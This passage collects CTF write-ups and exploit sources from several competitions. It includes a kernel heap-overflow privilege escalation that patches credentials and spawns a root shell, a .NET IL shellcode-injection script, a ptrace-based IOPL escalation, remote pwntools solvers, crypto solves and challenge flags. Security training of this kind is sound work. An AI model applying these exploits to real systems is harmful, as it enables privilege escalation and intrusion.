 87 |     except KeyboardInterrupt:
 88 |         pass
 89 |     httpd.server_close()
 90 |     logging.info('Stopping httpd...\n')
 91 | 
 92 | if __name__ == '__main__':
 93 |     from sys import argv
 94 | 
 95 |     if len(argv) == 2:
 96 |         run(port=int(argv[1]))
 97 |     else:
 98 |         run()
 99 | ```
100 | 
101 | ## Flag
102 | `TWCTF{ky0-wa-dare-n0-donna-yume-ni?kurukuru-mewkledreamy!}`
103 | `TWCTF{you-have-to-eat-tomato-yume-chan!}`


--------------------------------------------------------------------------------
/2019/midnightsunctf/tulpan257/writeup.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | tags: ["crypto", "probability"]
 3 | author: "black-simon"
 4 | ---
 5 | # Challenge
 6 | > We made a ZK protocol with a bit of HFS-flair to it!
 7 | 
 8 | We were given the following source code:
 9 | 
10 | ```flag = "XXXXXXXXXXXXXXXXXXXXXXXXX"
11 | p = 257
12 | k = len(flag) + 1
13 | 
14 | def prover(secret, beta=107, alpha=42):
15 |     F = GF(p)
16 |     FF.<x> = GF(p)[]
17 |     r = FF.random_element(k - 1)
18 |     masked = (r * secret).mod(x^k + 1)
19 |     y = [
20 |         masked(i) if randint(0, beta) >= alpha else
21 |         masked(i) + F.random_element()
22 |         for i in range(0, beta)
23 |     ]
24 |     return r.coeffs(), y
25 | 
26 | sage: prover(flag)
27 | [141, 56, 14, 221, 102, 34, 216, 33, 204, 223, 194, 174, 179, 67, 226, 101, 79, 236, 214, 198, 129, 11, 52, 148, 180, 49] [138, 229, 245, 162, 184, 116, 195, 143, 68, 1, 94, 35, 73, 202, 113, 235, 46, 97, 100, 148, 191, 102, 60, 118, 230, 256, 9, 175, 203, 136, 232, 82, 242, 236, 37, 201, 37, 116, 149, 90, 240, 200, 100, 179, 154, 69, 243, 43, 186, 167, 94, 99, 158, 149, 218, 137, 87, 178, 187, 195, 59, 191, 194, 198, 247, 230, 110, 222, 117, 164, 218, 228, 242, 182, 165, 174, 149, 150, 120, 202, 94, 148, 206, 69, 12, 178, 239, 160, 7, 235, 153, 187, 251, 83, 213, 179, 242, 215, 83, 88, 1, 108, 32, 138, 180, 102, 34]
28 | ```
29 | 
30 | # Solve
31 | 
32 | If we know `masked`, we can simply compute the flag by multiplying with the inverse of r (mod x^k + 1), and then looking at the coefficients.
33 | 
34 | But how do we get the value of `masked`?
35 | 
36 | We can interpolate polynomials of degree 25 (it holds that `k=26`, therefore every polynomial mod `x^k + 1` has a degree of at most 25) with 26 sampled points from the polynomial.
37 | 
38 | Since some of the points are polluted, we can only use a subset of them to interpolate the polynomial. We expect about 65 values to be correct and the rest to be incorrect. If we choose 26 values at random, the probability that they all are correct is
39 | ``` (65 nCr 26) / (107 nCr 26)``` which turns out to be about `1.91e-7`
40 | 
41 | Therefore we expect to need about `5.23e6` trials to find the correct polynomial, and we can just brute-force that many attempts.
42 | 
43 | # Implementation
44 | The following script yields the flag:
45 | ```
46 | flag = "XXXXXXXXXXXXXXXXXXXXXXXXX"
47 | p = 257
48 | k = len(flag) + 1
49 | 
50 | F = GF(p)
51 | FF.<x> = GF(p)[]
52 | 
53 | def prover(secret, beta=107, alpha=42):
54 |     F = GF(p)
55 |     FF.<x> = GF(p)[]
56 |     r = FF.random_element(k - 1)
57 |     masked = (r * secret).mod(x^k + 1)
58 |     y = [
59 |         masked(i) if randint(0, beta) >= alpha else
60 |         masked(i) + F.random_element()
61 |         for i in range(0, beta)
62 |     ]
63 |     return r.coefficients(), y
64 | 
65 | coeffs = [141, 56, 14, 221, 102, 34, 216, 33, 204, 223, 194, 174, 179, 67, 226, 101, 79, 236, 214, 198, 129, 11, 52, 148, 180, 49]
66 | 
67 | values = [138, 229, 245, 162, 184, 116, 195, 143, 68, 1, 94, 35, 73, 202, 113, 235, 46, 97, 100, 148, 191, 102, 60, 118, 230, 256, 9, 175, 203, 136, 232, 82, 242, 236, 37, 201, 37, 116, 149, 90, 240, 200, 100, 179, 154, 69, 243, 43, 186, 167, 94, 99, 158, 149, 218, 137, 87, 178, 187, 195, 59, 191, 194, 198, 247, 230, 110, 222, 117, 164, 218, 228, 242, 182, 165, 174, 149, 150, 120, 202, 94, 148, 206, 69, 12, 178, 239, 160, 7, 235, 153, 187, 251, 83, 213, 179, 242, 215, 83, 88, 1, 108, 32, 138, 180, 102, 34]
68 | 
69 | r = FF(coeffs)
70 | 
71 | rinv  = r.inverse_mod(x^k+1)
72 | import random
73 | import string
74 | for iii in range(1234567):
75 | 	if iii % 1000 == 0:
76 | 		print(iii)
77 | 	memes = random.sample(list(enumerate(values)), k)
78 | 	masked = FF.lagrange_polynomial(memes)
79 | 
80 | 	flag = (rinv * masked).mod(x^k+1)
81 | 	res = flag.coefficients()
82 | 	if all([cc <= 0xff and chr(cc) in string.printable for cc in res]):
83 | 		break
84 | print(res)
85 | print(''.join(map(chr, res)))
86 | ```
87 | 
88 | After about 3 million attempts, we get the flag
89 | > N0p3_th1s_15_n0T_R1ng_LpN
90 | 
91 | (FYI: there were 66 correct values provided)
92 | 
93 | # Alternative solution
94 | Have a look at Reed-Solomon codes: [Wikipedia](https://en.wikipedia.org/wiki/Reed%E2%80%93Solomon_error_correction)


--------------------------------------------------------------------------------
/2019/midnightsunctf/hfsipc/exploit.c:
--------------------------------------------------------------------------------
  1 | #include <unistd.h>
  2 | #include <string.h>
  3 | #include <stropts.h>
  4 | #include <stdio.h>
  5 | #include <stdlib.h>
  6 | #include <fcntl.h>
  7 | #include <sys/stat.h>
  8 | #include <sys/shm.h>
  9 | 
 10 | /* constants for the different commands */
 11 | #define ALLOCATE 0xABCD0001
 12 | #define DESTROY 0xABCD0002
 13 | #define READ 0xABCD0003
 14 | #define WRITE 0xABCD0004
 15 | 
 16 | /* struct for command parameters.
 17 |  * some commands do not use all the fields (for example, ALLOCATE only uses id and size)
 18 | */
 19 | typedef struct {
 20 |   long id;
 21 |   long size;
 22 |   char* buf;
 23 | } req;
 24 | 
 25 | /* file descriptor to the opened device (global variable for convenience) */
 26 | int hfs = -1;
 27 | 
 28 | /* open the device (must be called at start) */
 29 | void open_hfs() {
 30 |   hfs = open("/dev/hfs", O_RDWR);
 31 |   if (hfs < 0) {
 32 |     perror("[-] open hfs failed");
 33 |     exit(1);
 34 |   }
 35 |   printf("[+] open fd: %x\n", hfs);
 36 | }
 37 | 
 38 | 
 39 | void make_call(long action, long id, long size, void* buf) {
 40 |   req r = {.id = id, .size = size, .buf = buf };
 41 |   if (ioctl(hfs, action, &r) != 0) {
 42 |     perror("[-] ioctl failed");
 43 |     printf("ioctl args: %lx %lx %lx %p\n", action, id, size, buf);
 44 |     exit(1);
 45 |   }
 46 | }
 47 | 
 48 | /* print the data of a channel as nicely formated hex */
 49 | void dump(long id, long size) {
 50 |   char* buf = malloc(size);
 51 |   make_call(READ, id, size, buf);
 52 |   printf("%lx: ", id);
 53 |   for (long i = 0; i < size; ++i) {
 54 |     printf("%02hhx ", buf[i]);
 55 |   }
 56 |   printf("\n");
 57 |                                   
 58 |   free(buf);
 59 | }
 60 | 
 61 | /* kernel module representation of a channel */
 62 | typedef struct {
 63 |   long id;
 64 |   char* buf;
 65 |   long size;
 66 |   long padding;
 67 | } channel;
 68 | 
 69 | int main(int argc, char** argv) {
 70 |   open_hfs();
 71 | 
 72 |   // alloc some
 73 |   for (int i = 0; i < 0x85; ++i) {
 74 |       make_call(ALLOCATE, 0xf000 + i, 0x20, 0);
 75 |   }
 76 |   puts("[+] alloc done");
 77 | 
 78 |   // overwrite the next_free pointer of a freed chunk (0xf080 in this case)
 79 |   make_call(DESTROY, 0xf080, 0, 0);
 80 |   char overflow_data[0x21];
 81 |   memset(overflow_data, 'o', 0x21);
 82 |   // this offset was determined experimentally (play around in 0x20 increments)
 83 |   overflow_data[0x20] = 0xc0;
 84 |   make_call(WRITE, 0xf07f, 0x21, overflow_data);
 85 |   make_call(ALLOCATE, 0xf080, 0x20, 0);
 86 |   puts("[+] corruption done");
 87 |   fflush(stdout);
 88 | 
 89 |   // i don't 100% understand why this works but now f080->data points to f080 channel struct which is really nice
 90 |   // but it is confusing if it points to itself, make it point to some other channel struct
 91 |   channel leak;
 92 |   make_call(READ, 0xf080, 0x20, &leak);
 93 |   printf("[+] got leak: %p\n", leak.buf);
 94 |   leak.buf += 0x40;
 95 |   leak.id = 0x0; // set the id to zero, so that the freelist is correct again (0 is a valid next_ptr)
 96 |   make_call(WRITE, 0xf080, 0x20, &leak);
 97 | 
 98 |   // now, f080 points at the channel struct of f081
 99 |   // arbitrary WRITE!
100 |   dump(0x0, 0x20);
101 | 
102 |   // overwrite current tasks' real_cred and cred with initial task credentials
103 |   leak.buf = (char*)0xffffffff81a3a040; // pointer to task struct
104 |   leak.size = 8;
105 |   leak.id = 0xf081;
106 |   char* task_struct;
107 |   make_call(WRITE, 0x0, 0x20, &leak);
108 |   make_call(READ, 0xf081, 0x8, &task_struct);
109 |   printf("task_struct location: %p\n", task_struct);
110 | 
111 |   char* new_cred = (char*)0xffffffff81a3f1c0;
112 | 
113 |   char* real_cred;
114 |   leak.buf = task_struct + 0x3b8;
115 |   make_call(WRITE, 0x0, 0x20, &leak);
116 |   make_call(READ, 0xf081, 0x8, &real_cred);
117 |   make_call(WRITE, 0xf081, 0x8, &new_cred);
118 | 
119 |   char* cred;
120 |   leak.buf = task_struct + 0x3c0;
121 |   make_call(WRITE, 0x0, 0x20, &leak);
122 |   make_call(READ, 0xf081, 0x8, &cred);
123 |   make_call(WRITE, 0xf081, 0x8, &new_cred);
124 | 
125 |   printf("old real_cred %p cred %p\n", real_cred, cred);
126 | 
127 |   puts("[+] creds patched. should be root now");
128 |   execl("/bin/sh", "/bin/sh", NULL);
129 | 
130 |   puts("[+] done");
131 | }
132 | 


--------------------------------------------------------------------------------
/2020/twctf/il/il.md:
--------------------------------------------------------------------------------
  1 | # IL
  2 | 
  3 | For this task, we get a zip-file with a binary and multiple DLL's. The binary just seems to invoke `il.dll`, which does the following:
  4 | 
  5 | ```c#
  6 | private static void Main(string[] args)
  7 | {
  8 | 	try
  9 | 	{
 10 | 		Console.WriteLine("send me your spell:");
 11 | 		Console.Out.Flush();
 12 | 		byte[] array = Convert.FromBase64String(Console.ReadLine().Trim());
 13 | 		if (array.Length > 2035)
 14 | 		{
 15 | 			Console.WriteLine("hey your spell is way too long!");
 16 | 			Console.Out.Flush();
 17 | 		}
 18 | 		else
 19 | 		{
 20 | 			Console.WriteLine("okay, let's see what happens...");
 21 | 			Console.Out.Flush();
 22 | 			using (MemoryStream memoryStream = new MemoryStream(File.ReadAllBytes(Path.Join(Path.GetDirectoryName(Process.GetCurrentProcess().MainModule.FileName), "ilstub.dll"))))
 23 | 			{
 24 | 				memoryStream.Seek(604L, SeekOrigin.Begin);
 25 | 				memoryStream.Write(array, 0, array.Length);
 26 | 				memoryStream.Write(new byte[2035 - array.Length], 0, 2035 - array.Length);
 27 | 				memoryStream.WriteByte(42);
 28 | 				MethodInfo method = Assembly.Load(memoryStream.ToArray()).GetType("ILStub.Stub").GetMethod("Func", BindingFlags.Static | BindingFlags.Public);
 29 | 				Console.WriteLine("result=0x{0:x}", method.Invoke(null, new object[]
 30 | 				{
 31 | 					4919UL
 32 | 				}));
 33 | 				Console.Out.Flush();
 34 | 			}
 35 | 			Console.WriteLine("well done! see you next time!");
 36 | 			Console.Out.Flush();
 37 | 		}
 38 | 	}
 39 | 	catch (Exception ex)
 40 | 	{
 41 | 		Console.WriteLine("sorry but something went wrong...");
 42 | 		Console.WriteLine(ex.ToString());
 43 | 		Console.Out.Flush();
 44 | 	}
 45 | }
 46 | 
 47 | ```
 48 | 
 49 | It reads `ilstub.dll`, replaces a part of it with whatever it receives on stdin, and then calls a function. As it turns out, the place where it starts writing into the binary is at the start of that function:
 50 | 
 51 | ```c#
 52 | public static ulong Func(ulong arg)
 53 | {
 54 | 	arg ^= 1UL;
 55 | 	arg ^= 1UL;
 56 |     // ...
 57 | 	arg ^= 1UL;
 58 | 	return arg;
 59 | }
 60 | ```
 61 | 
 62 | This means we can supply abritrary dotnet IL, which then directly gets executed by the program. In order to exploit this, we modified the bytecode of `Func` using dnSpy in the following way:
 63 | 
 64 | ```c#
 65 | public unsafe static ulong Func(ulong arg)
 66 | {
 67 | 	arg ^= 1UL;
 68 | 	arg ^= 1UL;
 69 | 
 70 |     // preamble
 71 | 	long num = *(stackalloc byte[16] + 1094795585 /* 0x41414141 */);
 72 |     
 73 |     // write primitive
 74 | 	*num = 4774451407313060418L /* 0x4242424242424242 */;
 75 | 	long num2 = num + 8L;
 76 | 
 77 | 	arg ^= 1UL;
 78 | 	arg ^= 1UL;
 79 |     //...
 80 |   	arg ^= 1UL;
 81 | 	return arg;
 82 | }
 83 | ```
 84 | 
 85 | This uses a stack-allocated array to achieve an out-of-bound read on the stack (adding the offset `0x41414141` to wherever the array is on the stack). We use this to get the return address of the function, which will point into an rwx page since dotnet IL gets JIT-compiled. We then use the write primitive over and over again to write an x86-64 shellcode at that return address, which will then get executed after `Func` returns.
 86 | 
 87 | For this, we use the following python script to read this function from our modified `ilstub.dll`, replace the `0x41414141` with the correct offset and then repeat the write primitive for every 8-byte chunk of the shellcode where we replace the `0x4242424242424242`:
 88 | 
 89 | ```python
 90 | from pwn import *
 91 | from base64 import b64encode
 92 | 
 93 | context.arch = 'amd64'
 94 | 
 95 | with open('ilstub-cpy.dll', 'rb') as f:
 96 |     func = f.read()[612: 612 + 0x2B]
 97 | 
 98 | preamble = func[0: 0x1E].replace(b'\x41' * 8, p64(32))
 99 | write_primitive = func[0x1E:]
100 | 
101 | shellcode = group(8, asm(shellcraft.amd64.linux.sh()))
102 | 
103 | exploit = preamble[:]
104 | for block in shellcode:
105 |     exploit += write_primitive.replace(b'\x42' * 8, bytes(block).ljust(8, b'\x90'))
106 | 
107 | if args.REMOTE:
108 |     p = remote('pwn02.chal.ctf.westerns.tokyo', 23541)
109 | else:
110 |     p = process('./il')
111 | p.sendlineafter(b'spell:\n', b64encode(exploit))
112 | p.interactive()
113 | 
114 | ```
115 | 
116 | We use a shellcode that will just pop a shell. After getting the shell, it's just a matter of `cat`ing `flag.txt`: 
117 | `TWCTF{0n3_brINgS_5h4d0W_0nE_BRIng5_LighT}`


--------------------------------------------------------------------------------
/2020/hxpctf/wisdom2/exploit.c:
--------------------------------------------------------------------------------
  1 | #include <sys/cdefs.h>
  2 | #include <stdio.h>
  3 | #include <unistd.h>
  4 | #include <sys/mman.h>
  5 | #include <fcntl.h>
  6 | #include <string.h>
  7 | #include <sys/ptrace.h>
  8 | #include <assert.h>
  9 | #include <LibC/sys/arch/i386/regs.h>
 10 | #include <sys/wait.h>
 11 | #include <stdlib.h>
 12 | 
 13 | // IDE Reading Code taken from https://github.com/dhavalhirdhav/LearnOS/blob/fe764387c9f01bf67937adac13daace909e4093e/drivers/ata/ata.c
 14 | 
 15 | #define STATUS_BSY 0x80
 16 | #define STATUS_RDY 0x40
 17 | #define STATUS_DRQ 0x08
 18 | #define STATUS_DF 0x20
 19 | #define STATUS_ERR 0x01
 20 | 
 21 | // -Wall, -Werror :(
 22 | void raiseIOPL(void);
 23 | unsigned char port_byte_in(unsigned short port);
 24 | uint16_t port_word_in (uint16_t port);
 25 | void port_byte_out(unsigned short port, unsigned char data);
 26 | static void ATA_wait_BSY();
 27 | static void ATA_wait_DRQ();
 28 | void read_sectors_ATA_PIO(uint32_t target_address, uint32_t LBA, uint8_t sector_count);
 29 | 
 30 | unsigned char port_byte_in (unsigned short port) {
 31 |     unsigned char result;
 32 |     __asm__("in %%dx, %%al" : "=a" (result) : "d" (port));
 33 |     return result;
 34 | }
 35 | 
 36 | void port_byte_out (unsigned short port, unsigned char data) {
 37 |     __asm__("out %%al, %%dx" : : "a" (data), "d" (port));
 38 | }
 39 | 
 40 | uint16_t port_word_in (uint16_t port) {
 41 |     uint16_t result;
 42 |     __asm__("in %%dx, %%ax" : "=a" (result) : "d" (port));
 43 |     return result;
 44 | }
 45 | 
 46 | #define BASE 0x1F0
 47 | 
 48 | void read_sectors_ATA_PIO(uint32_t target_address, uint32_t LBA, uint8_t sector_count)
 49 | {
 50 |     ATA_wait_BSY();
 51 |     port_byte_out(BASE + 6,0xE0 | ((LBA >>24) & 0xF) | 0x10 /* drive 2 */);
 52 |     port_byte_out(BASE + 2,sector_count);
 53 |     port_byte_out(BASE + 3, (uint8_t) LBA);
 54 |     port_byte_out(BASE + 4, (uint8_t)(LBA >> 8));
 55 |     port_byte_out(BASE + 5, (uint8_t)(LBA >> 16));
 56 |     port_byte_out(BASE + 7,0x20); //Send the read command
 57 | 
 58 |     uint16_t *target = (uint16_t*) target_address;
 59 | 
 60 |     for (int j =0;j<sector_count;j++)
 61 |     {
 62 |         ATA_wait_BSY();
 63 |         ATA_wait_DRQ();
 64 |         for(int i=0;i<256;i++)
 65 |             target[i] = port_word_in(BASE);
 66 |         target+=256;
 67 |     }
 68 | }
 69 | 
 70 | static void ATA_wait_BSY()   //Wait for bsy to be 0
 71 | {
 72 |     while(port_byte_in(BASE + 7)&STATUS_BSY);
 73 | }
 74 | static void ATA_wait_DRQ()  //Wait fot drq to be 1
 75 | {
 76 |     while(!(port_byte_in(BASE + 7)&STATUS_RDY));
 77 | }
 78 | 
 79 | // Actual exploit here
 80 | void raiseIOPL() {
 81 |     int pid = fork();
 82 |     if (pid != 0) {
 83 |         int status;
 84 |         pid_t g_pid = pid;
 85 |         if (ptrace(PT_ATTACH, g_pid, 0, 0) == -1) {
 86 |             perror("attach");
 87 |             exit(-1);
 88 |         }
 89 | 
 90 |         if (waitpid(g_pid, &status, WSTOPPED | WEXITED) != g_pid || !WIFSTOPPED(status)) {
 91 |             perror("waitpid");
 92 |             exit(-1);
 93 |         }
 94 | 
 95 |         if (ptrace(PT_SYSCALL, g_pid, 0, 0) == -1) {
 96 |             perror("syscall");
 97 |             exit(-1);
 98 |         }
 99 | 
100 |         if (waitpid(g_pid, &status, WSTOPPED | WEXITED) != g_pid || !WIFSTOPPED(status)) {
101 |             perror("wait_pid");
102 |             exit(-1);
103 |         }
104 | 
105 |         PtraceRegisters regs = {};
106 |         if (ptrace(PT_GETREGS, g_pid, &regs, 0) == -1) {
107 |             perror("getregs");
108 |             exit(-1);
109 |         }
110 | 
111 |         regs.cs = 3;
112 |         regs.eflags |= 0x3000;
113 | 
114 |         if (ptrace(PT_SETREGS, g_pid, &regs, 0) == -1) {
115 |             perror("setregs");
116 |             exit(-1);
117 |         }
118 | 
119 |         if (ptrace(PT_DETACH, g_pid, 0, 0) == -1) {
120 |             perror("detach");
121 |             exit(-1);
122 |         }
123 | 
124 |         exit(0);
125 |     }
126 | 
127 |     sleep(2);
128 |     puts("Testing if IOPL has been raised...");
129 | 
130 |     int flags = 0;
131 |     asm volatile("pushf\npop %0\n" : "=r" (flags));
132 |     if ((flags & 0x3000) == 0x3000) {
133 |         puts("Successfully raised IOPL!");
134 |     } else {
135 |         puts("Failed to raise IOPL!");
136 |         exit(-1);
137 |     }
138 | }
139 | 
140 | int main(int, char**) {
141 |     raiseIOPL();
142 |     char data[512];
143 |     memset(data, 0, 512);
144 |     asm volatile("cli");
145 |     read_sectors_ATA_PIO((uint32_t) data, 0, 1);
146 |     asm volatile("sti");
147 |     printf("Flag: %s\n", (char*) data);
148 |     puts("Done");
149 |     return 0;
150 | }
151 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/pgp-com/pgp-com.md:
--------------------------------------------------------------------------------
  1 | # pgp-com
  2 | - Tags: crypto, misc
  3 | - Points: 451
  4 | - Solves: 24
  5 | 
  6 | ## Challenge
  7 | > You know how PGP works, right? 
  8 | 
  9 | We get an archive with one file: `pgp-communication.txt`
 10 | In this file we find a short message:
 11 | >We use PGP for secure communication to all participating teams and the
 12 | >organization. You know how PGP works, right?
 13 | > 
 14 | >Here are relevant keys and messages, your password is "changemeNOW" without
 15 | >quotes.
 16 | 
 17 | together with a `PGP PRIVATE KEY BLOCK`, a `PGP PUBLIC KEY BLOCK` and three `PGP MESSAGE` blocks.
 18 | 
 19 | ## Solution
 20 | 
 21 | Split the input file into 5 files: `publickey.txt`, `privatekey.txt`, `message1.txt`, `message2.txt`, `message3.txt`.
 22 | 
 23 | First we use GnuPG to import the public and private keys. To not pollute our global key database, we specify a custom `GNUPGHOME`:
 24 | 
 25 | ```
 26 | GNUPGHOME=/tmp/pgp-com gpg --import publickey.txt
 27 | GNUPGHOME=/tmp/pgp-com gpg --import privatekey.txt
 28 | ```
 29 | 
 30 | Now we take a look at what we got:
 31 | 
 32 | ```
 33 | GNUPGHOME=/tmp/pgp-com gpg --list-keys
 34 | pub   rsa4096 2019-04-02 [SCEA]      3E5FC53F2B3D0B92057DE7701437E68F5024FDC0
 35 | uid           [ unknown] Midnight Sun CTF Admin <admin@midnightsunctf.se>
 36 | pub   rsa4096 2019-04-02 [SCEA]      6AEEDDD07760D2B83482553BEBA63E4B442DB992
 37 | uid           [ unknown] Midnight Sun CTF Participating teams <teams@midnightsunctf.se>
 38 | pub   rsa4096 2019-04-02 [SCEA]      6CF8DEB045D8200275DE16A3BB0EAF2215849295
 39 | uid           [ unknown] Midnight Sun CTF Devteam maillist <devs@midnightsunctf.se>
 40 | ```
 41 | 
 42 | ```
 43 | GNUPGHOME=/tmp/pgp-com gpg --list-secret-keys
 44 | sec   rsa4096 2019-04-02 [SCEA]
 45 |       6AEEDDD07760D2B83482553BEBA63E4B442DB992
 46 | uid           [ unknown] Midnight Sun CTF Participating teams <teams@midnightsunctf.se>
 47 | 
 48 | ```
 49 | 
 50 | Public keys for three emails, private key only for one email.
 51 | Using the private key, we can decrpyt messages 1 and 3. The private key is encrypted, so gpg prompts for a password on decrypt. Luckily the message in the file gave us the password: `changemeNOW`. For Message 2 we get `decryption failed: No secret key`, since it is only send to devs and admin.
 52 | 
 53 | ```
 54 | GNUPGHOME=/tmp/pgp-com gpg --decrypt message1.txt
 55 | Hi,
 56 | This is a message just to say hello and welcome you all to the competition.
 57 | We are now introducing our own implementation of the super secure PGP messaging format.
 58 | We will use it for all important communication during the CTF.
 59 | Best regards,
 60 | CTF Admin
 61 | 
 62 | GNUPGHOME=/tmp/pgp-com gpg --decrypt message3.txt
 63 | We have received some indications that our PGP implementation has problems with randomness.
 64 | The dev team is currently working on fixing the issue.
 65 | We will not use this system for further messages until it has been fixed.
 66 | Your key pairs were not generatad by this system, and they should be safe even for future use.
 67 | ```
 68 | 
 69 | After first looking around the packets a bit, to see if there is anything hidden in them (eg. with `gpg --list-packets --verbose message1.txt`) and not finding anything, we notice the hint in the messages:
 70 | 
 71 | They say the key pairs are safe, so no problem there. But there is an issue with randomness in their PGP implementation. Looking up how pgp works, you see that messages are encrypted with a symmetric cipher. The key is randomly generated for each message, and encrypted with the public keys of the recipients. The referenced 'problem with randomness' is therefore probably a weakness in these symmetric keys.
 72 | 
 73 | They can easily be dumped with
 74 | ```
 75 | GNUPGHOME=/tmp/pgp-com gpg --show-session-key < message1.txt
 76 | ...
 77 | session key: '9:0000000000000000000000000000000000000000000000000000000000001336'
 78 | ...
 79 | 
 80 | GNUPGHOME=/tmp/pgp-com gpg --show-session-key < message3.txt
 81 | ...
 82 | session key: '9:0000000000000000000000000000000000000000000000000000000000001338'
 83 | ...
 84 | ```
 85 | 
 86 | We guess that message2 has a key of `1337` and get the flag:
 87 | ```
 88 | GNUPGHOME=/tmp/pgp-com gpg --override-session-key 9:0000000000000000000000000000000000000000000000000000000000001337 < message2.txt
 89 | ...
 90 | From: Midnight Sun CTF Admin <admin@midnightsunctf.se>
 91 | To: Midnight Sun CTF Devteam maillist <devs@midnightsunctf.se>
 92 | Subject: 
 93 | Date: 2019-04-02 17:27:07
 94 | 
 95 | Hi,
 96 | 
 97 | How could you implement a system with such bad session key generation!?
 98 | 
 99 | Please remeber that midnight{sequential_session_is_bad_session} in the future...
100 | 
101 | Best regards,
102 | CTF Admin
103 | 
104 | ```


--------------------------------------------------------------------------------
/2019/midnightsunctf/hfsdos/hfsdos.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | tags: ["pwn", "dos", "re"]
  3 | author: "bennofs"
  4 | ---
  5 | # Challenge
  6 | > You don't need a modern 'secure' language when you write bug-free code :) The flag is in FLAG2 
  7 | 
  8 | This was the second part of the HFSMBR/HFSDOS challenge. After entering the correct password for HFSMBR, we are greeted with:
  9 | 
 10 | ```
 11 | [HFS SECURE SHELL] Here is your flag for HFS-MBR: midnight{w0ah_Sh!t_jU5t_g0t_RE
 12 | ALmode} 
 13 | [HFS SECURE SHELL] loaded at 100f:0100 (0x101f0) and ready for some binary carna
 14 | ge!
 15 | 
 16 | [HFS-DOS]> 
 17 | ```
 18 | 
 19 | # Solution
 20 | Looking at the strings of the image, the challenge appears to be based on FreeDOS. So let's mount the image to extract the files from the FS:
 21 | 
 22 | ```
 23 | $ sudo losetup -P -f dos.img
 24 | $ sudo mount /dev/loop0p1 /mnt
 25 | $ ls /mnt
 26 | AUTOEXEC.BAT*  COMMAND.COM*  FLAG1*  FLAG2*  KERNEL.SYS*
 27 | ```
 28 | 
 29 | The file we are looking for is COMMAND.COM. This file implements the the command interpreter we saw when we started the challenge. Here's the disassembly of the command-reading loop:
 30 | 
 31 | ```
 32 | seg000:019D read_command:                           ; CODE XREF: commandLoop↑j
 33 | seg000:019D                 mov     bx, offset input_buf
 34 | seg000:01A0                 mov     input_ptr, bx
 35 | seg000:01A4                 mov     input_len, 0
 36 | seg000:01AA                 xor     bx, bx
 37 | seg000:01AC
 38 | seg000:01AC input_loop:                             ; CODE XREF: commandLoop+2D↓j
 39 | seg000:01AC                                         ; commandLoop+37↓j ...
 40 | seg000:01AC                 mov     bh, 1
 41 | seg000:01AE                 mov     ah, 0
 42 | seg000:01B0                 int     16h             ; KEYBOARD - READ CHAR FROM BUFFER, WAIT IF EMPTY
 43 | seg000:01B0                                         ; Return: AH = scan code, AL = character
 44 | seg000:01B2                 cmp     al, 0Dh
 45 | seg000:01B4                 jz      short process_command
 46 | seg000:01B6                 cmp     al, 7Fh
 47 | seg000:01B8                 jnz     short store_char
 48 | seg000:01BA                 sub     input_ptr, 1
 49 | seg000:01BF                 mov     ah, 3
 50 | seg000:01C1                 mov     bh, 0
 51 | seg000:01C3                 int     10h             ; - VIDEO - READ CURSOR POSITION
 52 | seg000:01C3                                         ; BH = page number
 53 | seg000:01C3                                         ; Return: DH,DL = row,column, CH = cursor start line, CL = cursor end line
 54 | seg000:01C5                 cmp     dl, 0
 55 | seg000:01C8                 jz      short input_loop
 56 | seg000:01CA                 dec     dl
 57 | seg000:01CC                 mov     ah, 2
 58 | seg000:01CE                 mov     bh, 0
 59 | seg000:01D0                 int     10h             ; - VIDEO - SET CURSOR POSITION
 60 | seg000:01D0                                         ; DH,DL = row, column (0,0 = upper left)
 61 | seg000:01D0                                         ; BH = page number
 62 | seg000:01D2                 jmp     short input_loop
 63 | seg000:01D4 ; --------------------------------------------
 64 | ```
 65 | 
 66 | Note that if `al` (character) is `0x7F` (backspace), we decrement the pointer to the current position in our buffer if the current cursor position is greater than 0.
 67 | But because of the prompt, even at the start of the buffer the cursor column is greater than zero. This allows us to overwrite data before the start of the buffer. 
 68 | Let's check what's located before the input buffer:
 69 | 
 70 | ```
 71 | seg000:0389                 dw offset jmp_halt
 72 | seg000:0395 aFlag1          db 'FLAG1',0            ; DATA XREF: openFlag1+A↑o
 73 | seg000:039B                 db  24h ; $
 74 | seg000:039C input_buf       db    0                 ; DATA XREF: commandLoop:read_command↑o
 75 | ```
 76 | 
 77 | So there is the name of FLAG1 file and the end of the jump table for the command dispatch. This is quite nice, because it makes the exploit easy:
 78 | 
 79 | - overwrite FLAG1 with FLAG2 by changing 1 -> 2
 80 | - change `offset jmp_halt` (0x171) to `offset printFlagStage1` (0x14F)
 81 | 
 82 | Here's a script that does just that:
 83 | 
 84 | ```python
 85 | #!/usr/bin/env python3
 86 | from pwn import *
 87 | 
 88 | r = remote(b"hfs-os-01.play.midnightsunctf.se", 31337)
 89 | r.sendafter(b"]> ", b"sojupwner")
 90 | r.recvline_contains(b"Correct password!")
 91 | r.send(b"adssad\r")
 92 | r.sendafter(b"]>", b"\x7f"*3 + b"2\r")
 93 | r.sendafter(b"]>", b"\x7f"*9 + b"O\r")
 94 | r.sendafter(b"]>", b"exit\r")
 95 | r.recvuntil(b"Here is your flag")
 96 | print(r.recvuntil(b"}").replace(b"\r\n", b""))
 97 | r.stream()
 98 | ```
 99 | 
100 | which gets the flag: 
101 | 
102 | ```
103 | $ ./script.py
104 | [+] Opening connection to b'hfs-os-01.play.midnightsunctf.se' on port 31337: Done
105 | b' for HFS-MBR: midnight{th4t_was_n0t_4_buG_1t_is_a_fEatuR3}'
106 | ```
107 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/ezdsa/ezdsa.md:
--------------------------------------------------------------------------------
  1 | # EZDSA
  2 | - Tags: crypto
  3 | - Points: 223
  4 | - Solves: 57
  5 | 
  6 | ## Challenge
  7 | >Someone told me not to use DSA, so I came up with this. 
  8 | 
  9 | We get a server IP and part of the python code which runs on it.
 10 | 
 11 | Connecting to the server we see:
 12 | ```
 13 | Welcome to Spooners' EZDSA
 14 | Options:
 15 | 1. Sign protocol
 16 | 2. Quit
 17 | 1
 18 | Enter data:
 19 | asdf
 20 | (566787836513318161631424115768553230152020123938L, 150528027594773609234378622493646221096430839490L)
 21 | Options:
 22 | 1. Sign protocol
 23 | 2. Quit
 24 | 2
 25 | KBye.
 26 | Quitting...
 27 | ```
 28 | Code:
 29 | ```python
 30 | from hashlib import sha1
 31 | from Crypto import Random
 32 | from flag import FLAG
 33 | 
 34 | 
 35 | class PrivateSigningKey:
 36 | 
 37 |     def __init__(self):
